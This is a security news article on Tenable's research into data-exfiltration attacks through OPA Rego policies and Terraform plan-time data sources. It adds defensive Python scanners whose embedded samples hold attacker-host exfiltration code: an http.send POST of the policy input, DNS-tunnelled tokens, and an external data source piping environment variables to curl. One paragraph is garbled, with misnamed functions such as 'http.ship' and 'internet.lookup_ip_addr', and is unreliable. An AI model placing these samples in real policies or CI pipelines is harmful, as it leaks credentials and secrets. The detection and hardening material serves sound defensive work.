Cybersecurity Blind Spots in IaC and PaC Tools Expose Cloud Platforms to New Attacks



Nov 25, 2024 · Ravie Lakshmanan · Cloud Security / Supply Chain Attack


Cybersecurity researchers have disclosed two new attack techniques against infrastructure-as-code (IaC) and policy-as-code (PaC) tools such as HashiCorp's Terraform and Open Policy Agent (OPA). Both tools rely on dedicated, domain-specific languages (DSLs), and the techniques abuse those languages to breach cloud platforms and exfiltrate data.

"Since these are hardened languages with limited capabilities, they are supposed to be more secure than standard programming languages – and indeed they are," Tenable senior security researcher Shelly Raban said in a technical report published last week. "However, more secure does not mean bulletproof."

OPA is a popular, open-source policy engine that allows organizations to enforce policies across cloud-native environments such as microservices, CI/CD pipelines, and Kubernetes. Policies are written in a native query language called Rego, which OPA evaluates against an input document to return a decision.


The attack technique devised by Tenable targets the supply chain: an attacker who has gained unauthorized access, for instance through a compromised access key, inserts a malicious Rego policy into an OPA server. That policy is then evaluated during the policy decision phase, and because Rego policies can call built-in functions, it can perform malicious actions such as credential exfiltration using the built-in function "http.send".

Even in cases the place an OPA deployment restricts the usage of http.ship, the cybersecurity agency discovered that it is potential to make the most of one other perform named “internet.lookup_ip_addr” to smuggle the info utilizing DNS lookups through a method known as DNS tunneling.

"So, the net.lookup_ip_addr function is another function you might consider restricting or at least looking for in policies, as it also introduces the risk of data exfiltration from your OPA deployment," Raban said.
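The two points above, that a Rego policy can call http.send or net.lookup_ip_addr to move data off the OPA host and that such calls are worth looking for, can be turned into a simple check. The following is an added example written for this article, not code from Tenable's report or from the OPA project. The Rego policy it scans is a constructed sample (the attacker hostname and the package name are made up) that returns a legitimate-looking decision while leaking the evaluation input; the scanner reports every call to an exfiltration-capable builtin, and a second helper strips those builtins from an OPA capabilities document so that a policy using them fails `opa check --capabilities` / `opa build --capabilities` instead of running. The trimmed capabilities dictionary is likewise constructed to mimic the shape of `opa capabilities --current` output.

```python
import json
import re

# Constructed sample: a Rego policy that makes a plausible authz decision but
# also leaks the evaluation input (which frequently carries bearer tokens).
# "collector.attacker.example" and package "authz" are hypothetical.
MALICIOUS_POLICY = """\
package authz

import rego.v1

default allow := false

allow if {
    input.user.role == "admin"
}

# Primary exfiltration channel: POST the whole input to an attacker server.
leak_http := http.send({
    "method": "POST",
    "url": "https://collector.attacker.example/ingest",
    "body": input,
})

# Fallback for when http.send is blocked: the token rides inside a DNS query.
leak_dns := net.lookup_ip_addr(concat(".", [
    base64url.encode(input.token),
    "collector.attacker.example",
]))
"""

# The two network-capable builtins named in Tenable's report.
RISKY_BUILTINS = ("http.send", "net.lookup_ip_addr")

# A risky builtin name followed by "(" and not preceded by an identifier
# character, so that e.g. a user-defined "my_http.send(" is not matched.
BUILTIN_CALL = re.compile(
    r"(?<![\w.])(" + "|".join(map(re.escape, RISKY_BUILTINS)) + r")\s*\("
)


def find_risky_builtins(policy_text):
    """Return [(line_number, builtin_name), ...] for every risky call in a Rego source.

    Trailing "#" comments are stripped first so that a commented-out example is
    not reported; this simple splitter does not understand "#" inside strings.
    """
    hits = []
    for lineno, line in enumerate(policy_text.splitlines(), start=1):
        code = line.split("#", 1)[0]
        for m in BUILTIN_CALL.finditer(code):
            hits.append((lineno, m.group(1)))
    return hits


# Constructed, heavily trimmed stand-in for `opa capabilities --current` output.
SAMPLE_CAPABILITIES = {
    "builtins": [
        {"name": "concat", "decl": {"type": "function"}},
        {"name": "http.send", "decl": {"type": "function"}},
        {"name": "net.lookup_ip_addr", "decl": {"type": "function"}},
        {"name": "base64url.encode", "decl": {"type": "function"}},
    ],
}


def restrict_capabilities(capabilities, denied=RISKY_BUILTINS):
    """Return a copy of an OPA capabilities document without the denied builtins.

    Feeding the result to `opa check --capabilities` or `opa build --capabilities`
    rejects any policy that calls a removed builtin at compile time, which is a
    stronger control than hoping a reviewer spots the call.
    """
    kept = [b for b in capabilities.get("builtins", []) if b.get("name") not in denied]
    return {**capabilities, "builtins": kept}


if __name__ == "__main__":
    for lineno, name in find_risky_builtins(MALICIOUS_POLICY):
        print(f"line {lineno}: exfiltration-capable builtin {name}")
    print(json.dumps(restrict_capabilities(SAMPLE_CAPABILITIES), indent=2))
```

Running the scanner on a real policy bundle before it reaches the OPA server is the "look for it in policies" half of Raban's advice; the capabilities file is the "restrict it" half. Neither replaces network egress controls on the OPA host, since a policy that cannot call these builtins still runs with whatever network access the process has.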

Terraform, like OPA, aims to simplify setting up, deploying, and managing cloud resources through code-based definitions. These configurations are written in another declarative DSL, HashiCorp Configuration Language (HCL).

An attacker could target the open-source IaC platform by abusing its "terraform plan" command, which is typically run as part of GitHub "pull_request" workflows, to execute unreviewed changes containing a malicious data source during the CI/CD process. The point is that plan is usually treated as a read-only, safe-to-automate step, yet data sources are evaluated while it runs.

"This poses a risk, as an external attacker in a public repository or a malicious insider (or an external attacker with a foothold) in a private repository could exploit a pull request for their malicious objectives," Tenable noted. "Data sources run during 'terraform plan,' which significantly lowers the entry point for attackers."


Such a data source could be a rogue external data source (which runs an arbitrary program on the runner), a Terraform module pulled from an untrusted location, or a DNS data source (which, like net.lookup_ip_addr in OPA, can carry data out in the queried name), so only third-party components from trusted sources should be used. Other recommendations for mitigating these risks include:

  • Implement granular role-based access control (RBAC) and follow the principle of least privilege
  • Set up application-level and cloud-level logging for monitoring and analysis
  • Limit the network and data access of the applications and the underlying machines
  • Prevent automatic execution of unreviewed and potentially malicious code in CI/CD pipelines

Additionally, organizations can use IaC scanning tools such as Terrascan and Checkov to identify misconfigurations and compliance issues before deployment.
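To make the Terraform half of the advice concrete, here is an added example of the kind of pre-plan check a pipeline can run over a pull request's `.tf` files. It is written for this article and is not Tenable's code, nor a substitute for Checkov or Terrascan. The HCL it scans is a constructed sample containing the three data-source types the text names (external, http, and a DNS record lookup) plus one module from an untrusted git source; the attacker hostname, organization names and module allowlist are all hypothetical. The scanner is deliberately regex-based so it runs with no dependencies; it flags every data source that does work during `terraform plan` and every non-local module whose source is not on the allowlist.

```python
import re

# Constructed sample pull-request change. Hostnames and org names are made up.
SAMPLE_TF = """\
terraform {
  required_providers {
    aws = { source = "hashicorp/aws" }
  }
}

# Runs an arbitrary program on the CI runner as soon as `terraform plan` runs.
data "external" "leak" {
  program = ["sh", "-c", "env | curl -s --data-binary @- https://collector.attacker.example/ingest"]
}

# Outbound HTTP during plan; the query string can carry anything in scope.
data "http" "beacon" {
  url = "https://collector.attacker.example/beacon?repo=${var.repo}"
}

# DNS fallback: the secret rides in the hostname that gets resolved.
data "dns_a_record_set" "tunnel" {
  host = "${base64encode(var.ci_token)}.collector.attacker.example"
}

module "vpc" {
  source  = "terraform-aws-modules/vpc/aws"
  version = "5.1.0"
}

module "backdoor" {
  source = "git::https://github.com/not-our-org/modules.git//vpc?ref=main"
}

module "network" {
  source = "./modules/network"
}

resource "aws_s3_bucket" "logs" {
  bucket = "example-logs"
}
"""

# Data sources that execute or reach the network during `terraform plan`.
RISKY_DATA_SOURCES = {
    "external": "runs an arbitrary program on the runner during plan",
    "http": "performs an outbound HTTP request during plan",
}
DNS_DATA_SOURCE = re.compile(r"^dns_")  # dns_a_record_set, dns_txt_record_set, ...

# Hypothetical allowlist: a public registry namespace and a private registry org.
TRUSTED_MODULE_SOURCES = (
    re.compile(r"^terraform-aws-modules/"),
    re.compile(r"^app\.terraform\.io/example-org/"),
)

DATA_BLOCK = re.compile(r'^[ \t]*data[ \t]+"([^"]+)"[ \t]+"([^"]+)"[ \t]*\{', re.M)
MODULE_BLOCK = re.compile(r'^[ \t]*module[ \t]+"([^"]+)"[ \t]*\{', re.M)
SOURCE_ATTR = re.compile(r'^[ \t]*source[ \t]*=[ \t]*"([^"]+)"', re.M)


def find_risky_terraform(tf_text):
    """Return [(line_number, finding), ...] for plan-time data sources and
    non-local module sources that are not on the allowlist."""
    findings = []

    def lineno(pos):
        return tf_text.count("\n", 0, pos) + 1

    for m in DATA_BLOCK.finditer(tf_text):
        kind, name = m.group(1), m.group(2)
        if kind in RISKY_DATA_SOURCES:
            findings.append((lineno(m.start()), f'data "{kind}" "{name}": {RISKY_DATA_SOURCES[kind]}'))
        elif DNS_DATA_SOURCE.match(kind):
            findings.append((lineno(m.start()), f'data "{kind}" "{name}": resolves an attacker-controllable name during plan (DNS tunneling channel)'))

    for m in MODULE_BLOCK.finditer(tf_text):
        name = m.group(1)
        end = tf_text.find("\n}", m.end())  # sample modules have no nested blocks
        body = tf_text[m.end():end if end != -1 else len(tf_text)]
        src = SOURCE_ATTR.search(body)
        if src is None:
            continue
        source = src.group(1)
        if source.startswith(("./", "../")):
            continue  # in-repo module: reviewed together with the rest of the PR
        if not any(p.match(source) for p in TRUSTED_MODULE_SOURCES):
            findings.append((lineno(m.start()), f'module "{name}": source {source!r} is not on the trusted-source allowlist'))
    return findings


if __name__ == "__main__":
    for line, finding in find_risky_terraform(SAMPLE_TF):
        print(f"line {line}: {finding}")
```

A non-empty result should fail the workflow before `terraform plan` is invoked, which is the practical form of "prevent automatic execution of unreviewed code": the plan step still runs automatically for clean changes, but a change that introduces a plan-time data source or an unknown module source waits for a human. Pinning the remaining trusted modules to exact versions, as the `vpc` module in the sample does, keeps an upstream tag move from becoming a silent change.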



